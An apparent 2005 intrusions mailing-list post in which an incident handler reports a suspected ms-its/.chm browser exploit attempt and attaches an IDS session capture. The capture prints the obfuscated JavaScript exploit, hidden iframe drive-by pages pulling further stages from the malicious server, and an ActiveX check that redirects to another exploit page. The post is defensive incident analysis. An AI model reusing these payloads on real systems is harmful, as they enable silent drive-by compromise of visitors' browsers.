obfuscated javascript on 85.255.113.212

James Affeld <[email protected]> Mon, 24 Oct 2005 17:50:59 -0700 (PDT)
Newsgroups gmane.comp.security.intrusions
Message-ID <[email protected]>
--0-1080258954-1130201459=:13989
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Content-Id: 
Content-Disposition: inline

I am tracking what looks like an attempt to exploit
the ms-its / .chm vulnerabilities.  I don't write (or
even read) javascript, but it looks like simple
substitution for obfuscation.  

DST: Content-Type: image/gif
DST: 
DST: <html><meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
DST: <BODY>
DST: 
DST: <script language="javascript">
DST: out='" type="text/x-scriptlet"></object>';
DST: in_='<object data="';
DST: expl="/q.chm::/q.htm";
DST: file="file://C:\rtsk.mht!";
DST: m_htm_l=":mhtml:";
DST: msi="ms"+"-"+"its";
DST: 
DST:
document.write(in_+msi+m_htm_l+file+location.href.substring(0,location.href.indexOf('image.gif'))+expl+out);
DST: </script>
DST: </BODY>
DST: </html>

I translate this as: 

document.write(<object
data=ms-its:mhtml:file://c:\rtsk.mht!location.href.substring(0,location.href.index0f('image.gif'))/q.chm::/q.htm
type="text/x-scriptlet"></object>

and wonder why they would go to the trouble if they
didn't want to hide signatures.  Any incident handlers
ready to play Follow the Bouncing Malware? 

The session transcript is attached.  


	
		
__________________________________ 
Yahoo! Mail - PC Magazine Editors' Choice 2005 
http://mail.yahoo.com


	
		
__________________________________ 
Yahoo! Mail - PC Magazine Editors' Choice 2005 
http://mail.yahoo.com
--0-1080258954-1130201459=:13989
Content-Type: text/plain; name="ms-its.ids_sensor1_445892.txt"
Content-Description: 1722202362-ms-its.ids_sensor1_445892.txt
Content-Disposition: inline; filename="ms-its.ids_sensor1_445892.txt"

Sensor Name:	ids_sensor1
Timestamp:	2005-10-23 15:48:27
Connection ID:	.ids_sensor1_445892
Src IP:		168.156.104.36	(Unknown)
Dst IP:		85.255.113.212	(Unknown)
Src Port:		4552
Dst Port:		80
OS Fingerprint:	168.156.104.36:4552 - Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) 
OS Fingerprint:	  -> 85.255.113.212:80 (distance 0, link: ethernet/modem)
OS Fingerprint:	168.156.104.36:4552 - Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) 
OS Fingerprint:	  -> 85.255.113.212:80 (distance 0, link: ethernet/modem)

SRC: GET /freehost/jonh/i3.php HTTP/1.1
SRC: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
SRC: Referer: http://www.mysweetgallery.com/CGLH082YLEV/003/yzM11y7.html
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
SRC: Host: 85.255.113.212
SRC: Connection: Keep-Alive
SRC: 
SRC: 
DST: HTTP/1.1 200 OK
DST: Date: Sun, 23 Oct 2005 15:04:23 GMT
DST: Server: Apache/1.3.33 (Unix)  (Red-Hat/Linux) PHP/4.3.10
DST: X-Powered-By: PHP/4.3.10
DST: Set-Cookie: dp5229mds=1130079863; expires=Mon, 24-Oct-2005 15:04:23 GMT
DST: Keep-Alive: timeout=2, max=1000
DST: Connection: Keep-Alive
DST: Transfer-Encoding: chunked
DST: Content-Type: text/html
DST: 
DST: 37c
DST: <html>
DST: 
DST: <head>
DST: </head>
DST: 
DST: <body bgcolor="#336699">
DST: <SCRIPT language="javascript">
DST: if(window.navigator.userAgent.indexOf("SV1") != -1){
DST: document.write("<iframe src='http://85.255.113.212/5/s2n/sp2_1.html' border=0 width=0 height=0></iframe>");
DST: document.write("<iframe src='http://85.255.113.212/freehost/jonh/jnew/vx_check.htm' border=0 width=0 height=0></iframe>");
DST: }
DST: else
DST: {
DST: document.write("<iframe src='http://85.255.113.212/freehost/jonh/s1/image.gif' frameborder=0 width=1 height=1 scrolling=no></iframe>");
DST: document.write("<iframe src='http://85.255.113.212/freehost/jonh/s2n/sp2_1.html' frameborder=0 width=1 height=1 scrolling=no></iframe>");
DST: document.write("<iframe src='http://85.255.113.212/freehost/jonh/jnew/vx_check.htm' border=0 width=0 height=0></iframe>");
DST: window.open('http://85.255.113.212/freehost/jonh/sl/index.html','_blank','left=5000');
DST: };
DST: </SCRIPT>
DST: 
DST: 
DST: 
DST: </body>
DST: 
DST: </html>
DST: 
DST: 0
DST: 
DST: 
SRC: GET /freehost/jonh/s1/image.gif HTTP/1.1
SRC: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
SRC: Referer: http://85.255.113.212/freehost/jonh/i3.php
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
SRC: Host: 85.255.113.212
SRC: Connection: Keep-Alive
SRC: 
SRC: 
DST: HTTP/1.1 200 OK
DST: Date: Sun, 23 Oct 2005 15:04:23 GMT
DST: Server: Apache/1.3.33 (Unix)  (Red-Hat/Linux) PHP/4.3.10
DST: Last-Modified: Mon, 18 Apr 2005 13:40:45 GMT
DST: ETag: "9c876b-1a8-4263b8dd"
DST: Accept-Ranges: bytes
DST: Content-Length: 424
DST: Keep-Alive: timeout=2, max=999
DST: Connection: Keep-Alive
DST: Content-Type: image/gif
DST: 
DST: <html><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
DST: <BODY>
DST: 
DST: <script language="javascript">
DST: out='" type="text/x-scriptlet"></object>';
DST: in_='<object data="';
DST: expl="/q.chm::/q.htm";
DST: file="file://C:\rtsk.mht!";
DST: m_htm_l=":mhtml:";
DST: msi="ms"+"-"+"its";
DST: 
DST: document.write(in_+msi+m_htm_l+file+location.href.substring(0,location.href.indexOf('image.gif'))+expl+out);
DST: </script>
DST: </BODY>
DST: </html>
SRC: GET /freehost/jonh/jnew/vx_check.htm HTTP/1.1
SRC: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
SRC: Referer: http://85.255.113.212/freehost/jonh/i3.php
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
SRC: Host: 85.255.113.212
SRC: Connection: Keep-Alive
SRC: 
SRC: 
DST: HTTP/1.1 200 OK
DST: Date: Sun, 23 Oct 2005 15:04:23 GMT
DST: Server: Apache/1.3.33 (Unix)  (Red-Hat/Linux) PHP/4.3.10
DST: Last-Modified: Sun, 23 Oct 2005 14:31:36 GMT
DST: ETag: "9c8764-223-435b9ec8"
DST: Accept-Ranges: bytes
DST: Content-Length: 547
DST: Keep-Alive: timeout=2, max=998
DST: Connection: Keep-Alive
DST: Content-Type: text/html
DST: 
DST: <html>
DST: <body>
DST: <form name=sf><textarea name=sfd style="width: 1px; height: 1px;"></textarea></form>
DST: <script language="javascript">function se(){document.sf.sfd.value="e";}setTimeout('ex();',25);</script>
DST: <object classid="CLSID:004CE610-CCD1-11D0-A9BA-00A0C908DB5E" onError="se();"></object>
DST: <script language="javascript">function ex(){if((navigator.appName=="Microsoft Internet Explorer")&&(document.sf.sfd.value!="e")){document.location.href='vx_test2.htm';}}</script>
DST: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
DST: </body>
DST: </html>
DST: 



--0-1080258954-1130201459=:13989
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Intrusions mailing list
[email protected]
http://www.dshield.org/mailman/listinfo/intrusions

--0-1080258954-1130201459=:13989--